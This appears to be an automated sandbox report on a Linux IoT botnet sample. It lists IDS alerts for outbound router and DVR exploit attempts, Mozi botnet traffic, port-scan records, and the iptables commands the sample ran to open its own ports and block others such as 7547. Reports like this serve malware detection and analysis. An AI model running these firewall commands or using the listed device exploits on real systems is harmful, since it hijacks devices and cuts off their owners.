Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.142.94.93: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.102.211: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.162.58: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.249.224.17: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.16.47.151: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.35.88.172: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.27.78.110: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 27.32.160.214: -> 192.168.2.20:
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:41576
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.105.99.147: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.222.33.55: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.207.101.92: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.255.62.198: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 146.148.194.79: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.248.115: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.212.50.15: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:52540 -> 210.190.146.92:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 49.44.132.19:80 -> 192.168.2.20:37336
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37336 -> 49.44.132.19:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.254.52.37: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 71.227.22.112: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.234.240: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.189.49.186: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:50030 -> 104.238.100.85:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.179.24.162: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.124.230.135:80 -> 192.168.2.20:54640
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54640 -> 104.124.230.135:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:53902 -> 179.40.62.87:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.45.237.137: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.42.41.132: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 41.141.11.172: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.77.0.1: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.176.236: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.137.124.219: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.252.214.173: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.135.53.254: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.89.220.27: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.225.53.145: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.56.18.66: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.96.148.68: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.238.183.86: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.88.217: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.35:46153 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:45320 -> 45.148.37.237:80
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.247.167.217: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36288 -> 184.86.117.97:80
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.199.65.32: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.23.231.85: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 60.240.241.20: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.127.187:8082 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.63.180.12: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.91.249: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.134: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.236.31.232: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43254 -> 123.110.194.55:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 133.67.251.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.180.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.17.18.122: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:44576 -> 154.210.25.254:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:44576 -> 154.210.25.254:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:54110 -> 114.34.159.229:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:54110 -> 114.34.159.229:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.50.122.98: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50886 -> 154.3.84.96:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.33.227: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 213.163.117.122:8082 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.160.123: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60358 -> 166.88.13.234:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.23.254: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.106.144.216: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.109.232.198: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:47256 -> 204.232.228.51:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.83.241:80 -> 192.168.2.20:49468
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:41890 -> 118.48.130.177:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33196 -> 185.36.171.129:80

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 19.35.22.33 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 69.153.253.195 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 215.110.247.154 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 7.133.161.69 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 48.57.169.235 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 57.50.30.157 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 69.107.161.237 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 84.183.159.213 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 54.39.218.76 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 37.127.116.2 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 27.46.25.163 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 183.30.162.72 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 12.121.21.175 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 151.160.250.99 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 72.240.24.193 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 112.36.7.254 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 200.160.26.61 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 49.240.54.114 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 8.191.54.125 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 54.72.49.99 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 102.247.160.88 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 91.192.83.22 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 3.31.11.51 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 21.71.60.36 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 188.61.141.250 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 141.215.180.231 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 137.225.108.177 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 146.5.176.64 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 160.189.168.11 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 89.192.178.91 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 91.193.93.252 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 220.112.131.158 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 146.31.191.38 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 175.79.49.111 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 189.16.44.51 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 184.225.49.232 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 137.142.227.113 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 211.130.169.58 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 108.58.115.194 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 85.4.13.35 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 45.71.81.134 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 215.122.80.92 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.26.35.18 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 15.81.245.80 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 72.204.193.69 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 33.33.197.233 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 11.0.46.244 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 81.185.164.190 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 47.167.153.49 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 222.36.210.127 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 198.26.185.1 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 5.144.31.210 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 97.149.39.21 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 66.156.43.17 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 46.138.124.14 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 119.17.3.130 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 54.194.243.156 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 62.237.39.27 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 35.197.143.134 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 117.0.115.227 ports 2,5,6,8,9,52869

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4638)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5042)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 54390

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.20:50800 -> 173.128.113.111:7574
Source: global traffic	TCP traffic: 192.168.2.20:52994 -> 151.70.88.212:5555
Source: global traffic	TCP traffic: 192.168.2.20:40582 -> 37.127.116.2:52869
Source: global traffic	TCP traffic: 192.168.2.20:49692 -> 73.213.225.252:8443
Source: global traffic	TCP traffic: 192.168.2.20:44244 -> 164.95.80.124:8443
Source: global traffic	TCP traffic: 192.168.2.20:43214 -> 65.119.165.128:7574
Source: global traffic	TCP traffic: 192.168.2.20:41268 -> 112.60.138.223:7574
Source: global traffic	TCP traffic: 192.168.2.20:49422 -> 54.72.49.99:52869
Source: global traffic	TCP traffic: 192.168.2.20:43636 -> 159.134.45.88:8443
Source: global traffic	TCP traffic: 192.168.2.20:40086 -> 169.108.151.225:8443
Source: global traffic	TCP traffic: 192.168.2.20:58250 -> 46.69.243.160:81
Source: global traffic	TCP traffic: 192.168.2.20:50540 -> 45.71.81.134:37215
Source: global traffic	TCP traffic: 192.168.2.20:42756 -> 187.65.235.163:8080
Source: global traffic	TCP traffic: 192.168.2.20:47538 -> 133.182.208.68:8443
Source: global traffic	TCP traffic: 192.168.2.20:59888 -> 65.169.70.71:5555
Source: global traffic	TCP traffic: 192.168.2.20:52378 -> 96.200.64.71:7574
Source: global traffic	TCP traffic: 192.168.2.20:53936 -> 99.231.44.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:40382 -> 88.83.215.123:5555
Source: global traffic	TCP traffic: 192.168.2.20:60188 -> 112.188.233.56:7574
Source: global traffic	TCP traffic: 192.168.2.20:33888 -> 177.228.76.105:5555
Source: global traffic	TCP traffic: 192.168.2.20:38378 -> 196.250.243.57:8080
Source: global traffic	TCP traffic: 192.168.2.20:60388 -> 151.160.250.99:37215
Source: global traffic	TCP traffic: 192.168.2.20:36256 -> 141.215.180.231:52869
Source: global traffic	TCP traffic: 192.168.2.20:52424 -> 53.12.181.226:7574
Source: global traffic	TCP traffic: 192.168.2.20:35830 -> 72.240.24.193:52869
Source: global traffic	TCP traffic: 192.168.2.20:48832 -> 168.237.187.123:5555
